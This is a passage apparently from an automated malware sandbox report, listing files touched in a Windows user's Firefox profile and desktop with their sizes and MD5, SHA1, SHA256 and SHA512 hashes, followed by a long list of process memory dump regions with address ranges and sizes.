952b2cdf783ac72fcb98338723e9afd38d47ad8e

SHA256
33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

SHA512
7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll.sig.tmp

Filesize
1KB

MD5
36e5ee071a6f2f03c5d3889de80b0f0d

SHA1
cf6e8ddb87660ef1ef84ae36f97548a2351ac604

SHA256
6be809d16e0944386e45cf605eae0cd2cf46f111d1a6fe999fec813d2c378683

SHA512
99b61896659e558a79f0e9be95286ebf01d31d13b71df6db4923406e88b3ba72584ef2b62e073b2f5e06901af2c7d1b92d3d12187fe5b4b29c9dd2678444f34e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\prefs-1.js

Filesize
9KB

MD5
d341f5e04e2eb13539c2451ec0ca8d6e

SHA1
c75bcd54417feec60120f757519e058d3e1a1015

SHA256
24d53d412fb8fb163f9dfb532ac445844f95e13159a9359ce7a83f129ddec639

SHA512
7c7226248aad2941fe7cff80a8aff2a2210deab45d34673abf940dc06dced96ec9bde84441bff00e718f57d19f84e96f442caa22cd7257b7a2943d8c5acb87b4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\prefs.js

Filesize
11KB

MD5
356c97d6358eccef906f47bb82f2ed0c

SHA1
2f7932ce5caa220ba50e1940e13b553a490e6e63

SHA256
c498e1a8eb75486a741e0f8b8eef8f13491851c6602b6f141be3e842655ad27d

SHA512
65e3111c586fdbb0cb093f536797cb13afc3c7db022f19055d454a4309df07c631927e40624eef3b02981d19c0783b33406c0b12780d6885dbbd9547970d9d36

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\prefs.js

Filesize
10KB

MD5
d19b6d7c64e291c9f4eb932fb813e178

SHA1
51c7bc06dad8fc429e85ae35acf9b66332c224bd

SHA256
ac5fca5288888ba6c439dea6fede758327896c227f86381cc617228fa71d1904

SHA512
aa935497c4c37391fcd781ff49e6b99f32cfa7e7bb42c91c63367f012345b96be6424b96d7c96a45a77bf5eff14d311711d46629ce4032dcc0e8942f619cdef2

Download Submit
C:\Users\Admin\Desktop\YCL.lnk

Filesize
2KB

MD5
c5c12d61fcd6fb995c834334ce6c69e2

SHA1
cedf0974c8d18d05732706ffa2100f10ce761bcc

SHA256
2d80e6cd44913c1835a652052919c620c54ac2cb03233dc101a38880e1ddd82e

SHA512
1315679717d3f4b1d7b23eac3b01087a1357f4a5a1ff6288571942da53562711fe5b62a0d6e4cc7f2190c8a64650f317ef0a8d0c4f0bafdcc9b84f90c0acd03b

Download Submit
memory/468-821-0x0000000000D80000-0x000000000185D000-memory.dmp

Filesize
10.9MB

Download
memory/468-883-0x0000000000D80000-0x000000000185D000-memory.dmp

Filesize
10.9MB

Download
memory/468-884-0x0000000000D80000-0x000000000185D000-memory.dmp

Filesize
10.9MB

Download
memory/468-944-0x0000000000D80000-0x000000000185D000-memory.dmp

Filesize
10.9MB

Download
memory/536-759-0x00000000004B0000-0x0000000000940000-memory.dmp

Filesize
4.6MB

Download
memory/536-691-0x00000000004B0000-0x0000000000940000-memory.dmp

Filesize
4.6MB

Download
memory/768-164-0x0000000000D20000-0x00000000011BE000-memory.dmp

Filesize
4.6MB

Download
memory/768-165-0x0000000000D20000-0x00000000011BE000-memory.dmp

Filesize
4.6MB

Download
memory/928-942-0x00000000003E0000-0x000000000040F000-memory.dmp

Filesize
188KB

Download
memory/928-939-0x00000000003E0000-0x000000000040F000-memory.dmp

Filesize
188KB

Download
memory/1196-321-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/1196-323-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/1308-300-0x0000000000A10000-0x0000000000A6C000-memory.dmp

Filesize
368KB

Download
memory/1764-209-0x0000000069CC0000-0x000000006A71B000-memory.dmp

Filesize
10.4MB

Download
memory/1764-787-0x0000000000290000-0x0000000000F32000-memory.dmp

Filesize
12.6MB

Download
memory/1764-947-0x0000000000290000-0x0000000000F32000-memory.dmp

Filesize
12.6MB

Download
memory/1764-116-0x0000000000290000-0x0000000000F32000-memory.dmp

Filesize
12.6MB

Download
memory/1764-850-0x0000000000290000-0x0000000000F32000-memory.dmp

Filesize
12.6MB

Download
memory/1764-182-0x0000000000290000-0x0000000000F32000-memory.dmp

Filesize
12.6MB

Download
memory/1764-166-0x0000000000290000-0x0000000000F32000-memory.dmp

Filesize
12.6MB

Download
memory/1764-309-0x0000000000290000-0x0000000000F32000-memory.dmp

Filesize
12.6MB

Download
memory/2052-1206-0x00000000077F0000-0x0000000007E08000-memory.dmp

Filesize
6.1MB

Download
memory/2052-1301-0x0000000008DA0000-0x00000000092CC000-memory.dmp

Filesize
5.2MB

Download
memory/2052-1701-0x00000000096B0000-0x0000000009742000-memory.dmp

Filesize
584KB

Download
memory/2052-1204-0x0000000000D00000-0x0000000001178000-memory.dmp

Filesize
4.5MB

Download
memory/2052-1200-0x0000000000D00000-0x0000000001178000-memory.dmp

Filesize
4.5MB

Download
memory/2052-1207-0x00000000070A0000-0x00000000070B2000-memory.dmp

Filesize
72KB

Download
memory/2052-1299-0x00000000086A0000-0x0000000008862000-memory.dmp

Filesize
1.8MB

Download
memory/2052-1208-0x0000000007100000-0x000000000713C000-memory.dmp

Filesize
240KB

Download
memory/2052-1210-0x00000000073A0000-0x00000000074AA000-memory.dmp

Filesize
1.0MB

Download
memory/2052-1205-0x0000000000D00000-0x0000000001178000-memory.dmp

Filesize
4.5MB

Download
memory/2052-1702-0x0000000009650000-0x000000000966E000-memory.dmp

Filesize
120KB

Download
memory/2052-1699-0x0000000000D00000-0x0000000001178000-memory.dmp

Filesize
4.5MB

Download
memory/2708-71-0x00000000058A0000-0x0000000005E44000-memory.dmp

Filesize
5.6MB

Download
memory/2708-69-0x0000000000950000-0x0000000000A00000-memory.dmp

Filesize
704KB

Download
memory/2952-1274-0x0000000000830000-0x0000000000EBF000-memory.dmp

Filesize
6.6MB

Download
memory/2952-1270-0x0000000000830000-0x0000000000EBF000-memory.dmp

Filesize
6.6MB

Download
memory/3064-97-0x00000000011E0000-0x000000000123F000-memory.dmp

Filesize
380KB

Download
memory/3080-247-0x0000000000980000-0x00000000009AF000-memory.dmp

Filesize
188KB

Download
memory/3080-251-0x0000000000980000-0x00000000009AF000-memory.dmp

Filesize
188KB

Download
memory/3204-189-0x0000000000620000-0x0000000001032000-memory.dmp

Filesize
10.1MB

Download
memory/3204-207-0x0000000000620000-0x0000000001032000-memory.dmp

Filesize
10.1MB

Download
memory/3204-252-0x0000000000620000-0x0000000001032000-memory.dmp

Filesize
10.1MB

Download
memory/3204-148-0x0000000000620000-0x0000000001032000-memory.dmp

Filesize
10.1MB

Download
memory/3280-868-0x00000000009A0000-0x0000000000E5D000-memory.dmp

Filesize
4.7MB

Download
memory/3280-875-0x00000000009A0000-0x0000000000E5D000-memory.dmp

Filesize
4.7MB

Download
memory/3288-3-0x0000000000AB0000-0x0000000000F63000-memory.dmp

Filesize
4.7MB

Download
memory/3288-15-0x0000000000AB0000-0x0000000000F63000-memory.dmp

Filesize
4.7MB

Download
memory/3288-18-0x0000000000AB1000-0x0000000000B19000-memory.dmp

Filesize
416KB

Download
memory/3288-4-0x0000000000AB0000-0x0000000000F63000-memory.dmp

Filesize
4.7MB

Download
memory/3288-1-0x0000000077BE4000-0x0000000077BE6000-memory.dmp

Filesize
8KB

Download
memory/3288-0-0x0000000000AB0000-0x0000000000F63000-memory.dmp

Filesize
4.7MB

Download
memory/3288-2-0x0000000000AB1000-0x0000000000B19000-memory.dmp

Filesize
416KB

Download
memory/3292-562-0x00000000007F0000-0x0000000000CA3000-memory.dmp

Filesize
4.7MB

Download
memory/3292-20-0x00000000007F0000-0x0000000000CA3000-memory.dmp

Filesize
4.7MB

Download
memory/3292-851-0x00000000007F0000-0x0000000000CA3000-memory.dmp

Filesize
4.7MB

Download
memory/3292-187-0x00000000007F0000-0x0000000000CA3000-memory.dmp

Filesize
4.7MB

Download
memory/3292-70-0x00000000007F0000-0x0000000000CA3000-memory.dmp

Filesize
4.7MB

Download
memory/3292-801-0x00000000007F0000-0x0000000000CA3000-memory.dmp

Filesize
4.7MB

Download
memory/3292-132-0x00000000007F0000-0x0000000000CA3000-memory.dmp

Filesize
4.7MB

Download
memory/3292-19-0x00000000007F0000-0x0000000000CA3000-memory.dmp

Filesize
4.7MB

Download
memory/3292-77-0x00000000007F0000-0x0000000000CA3000-memory.dmp

Filesize
4.7MB

Download
memory/3292-78-0x00000000007F0000-0x0000000000CA3000-memory.dmp

Filesize
4.7MB

Download
memory/3292-79-0x00000000007F0000-0x0000000000CA3000-memory.dmp

Filesize
4.7MB

Download
memory/3292-17-0x00000000007F0000-0x0000000000CA3000-memory.dmp

Filesize
4.7MB

Download
memory/3348-844-0x0000000000400000-0x000000000045D000-memory.dmp

Filesize
372KB

Download
memory/3348-847-0x0000000000400000-0x000000000045D000-memory.dmp

Filesize
372KB

Download
memory/3520-48-0x00000000007F0000-0x0000000000CA3000-memory.dmp

Filesize
4.7MB

Download
memory/3520-68-0x00000000007F0000-0x0000000000CA3000-memory.dmp

Filesize
4.7MB

Download
memory/3916-184-0x0000000000490000-0x0000000000EA2000-memory.dmp

Filesize
10.1MB

Download
memory/3916-245-0x0000000000490000-0x0000000000EA2000-memory.dmp

Filesize
10.1MB

Download
memory/3916-133-0x0000000000490000-0x0000000000EA2000-memory.dmp

Filesize
10.1MB

Download
memory/3916-188-0x0000000000490000-0x0000000000EA2000-memory.dmp

Filesize
10.1MB

Download
memory/4404-268-0x0000000006380000-0x00000000066D4000-memory.dmp

Filesize
3.3MB

Download
memory/4404-517-0x0000000006BE0000-0x0000000006BFA000-memory.dmp

Filesize
104KB

Download
memory/4404-270-0x0000000006760000-0x000000000677E000-memory.dmp

Filesize
120KB

Download
memory/4404-254-0x0000000005920000-0x0000000005F48000-memory.dmp

Filesize
6.2MB

Download
memory/4404-271-0x00000000067A0000-0x00000000067EC000-memory.dmp

Filesize
304KB

Download
memory/4404-602-0x0000000007BB0000-0x0000000007BD2000-memory.dmp

Filesize
136KB

Download
memory/4404-257-0x0000000006130000-0x0000000006196000-memory.dmp

Filesize
408KB

Download
memory/4404-255-0x0000000005790000-0x00000000057B2000-memory.dmp

Filesize
136KB

Download
memory/4404-516-0x0000000007E00000-0x000000000847A000-memory.dmp

Filesize
6.5MB

Download
memory/4404-256-0x00000000060C0000-0x0000000006126000-memory.dmp

Filesize
408KB

Download
memory/4404-601-0x0000000007C20000-0x0000000007CB6000-memory.dmp

Filesize
600KB

Download
memory/4404-253-0x00000000031D0000-0x0000000003206000-memory.dmp

Filesize
216KB

Download
memory/4468-75-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/4468-73-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/4844-218-0x0000000000120000-0x000000000014F000-memory.dmp

Filesize
188KB

Download
memory/4844-274-0x0000000010000000-0x000000001001C000-memory.dmp

Filesize
112KB

Download
memory/4844-242-0x0000000000120000-0x000000000014F000-memory.dmp

Filesize
188KB

Download
memory/4844-238-0x0000000000120000-0x000000000014F000-memory.dmp

Filesize
188KB

Download
memory/4968-186-0x0000000000900000-0x0000000000F9E000-memory.dmp

Filesize
6.6MB

Download
memory/4968-183-0x0000000000900000-0x0000000000F9E000-memory.dmp

Filesize
6.6MB

Download
memory/5244-969-0x00000000001B0000-0x00000000001FC000-memory.dmp

Filesize
304KB

Download
memory/5260-842-0x0000000000940000-0x000000000099A000-memory.dmp

Filesize
360KB

Download
memory/5608-995-0x00000000007F0000-0x0000000000CA3000-memory.dmp

Filesize
4.7MB

Download
memory/5608-1000-0x00000000007F0000-0x0000000000CA3000-memory.dmp

Filesize
4.7MB

Download
memory/5904-1001-0x00000000073D0000-0x0000000007446000-memory.dmp

Filesize
472KB

Download
memory/5904-994-0x0000000006180000-0x00000000061CC000-memory.dmp

Filesize
304KB

Download
memory/5904-993-0x0000000005C90000-0x0000000005FE4000-memory.dmp

Filesize
3.3MB

Download
memory/5904-997-0x0000000007210000-0x0000000007254000-memory.dmp

Filesize
272KB

Download
memory/5904-1071-0x0000000007830000-0x0000000007872000-memory.dmp

Filesize
264KB

Download
memory/5904-1063-0x0000000004F40000-0x0000000004F4A000-memory.dmp

Filesize
40KB

Download
memory/6016-918-0x000000006FA50000-0x000000006FA9C000-memory.dmp

Filesize
304KB

Download
memory/6016-946-0x0000000007430000-0x0000000007441000-memory.dmp

Filesize
68KB

Download
memory/6016-933-0x0000000007410000-0x000000000741A000-memory.dmp

Filesize
40KB

Download
memory/6016-620-0x00000000008D0000-0x0000000000D7C000-memory.dmp

Filesize
4.7MB

Download
memory/6016-929-0x0000000007340000-0x00000000073E3000-memory.dmp

Filesize
652KB

Download
memory/6016-928-0x0000000007000000-0x000000000701E000-memory.dmp

Filesize
120KB

Download
memory/6016-917-0x0000000007020000-0x0000000007052000-memory.dmp

Filesize
200KB

Download
memory/6016-903-0x0000000006180000-0x00000000061CC000-memory.dmp

Filesize
304KB

Download
memory/6016-901-0x0000000005BB0000-0x0000000005F04000-memory.dmp

Filesize
3.3MB

Download
memory/6016-968-0x0000000005B30000-0x0000000005B3A000-memory.dmp

Filesize
40KB

Download
memory/6016-967-0x0000000007730000-0x0000000007742000-memory.dmp

Filesize
72KB

Download
memory/6016-610-0x00000000008D0000-0x0000000000D7C000-memory.dmp

Filesize
4.7MB

Download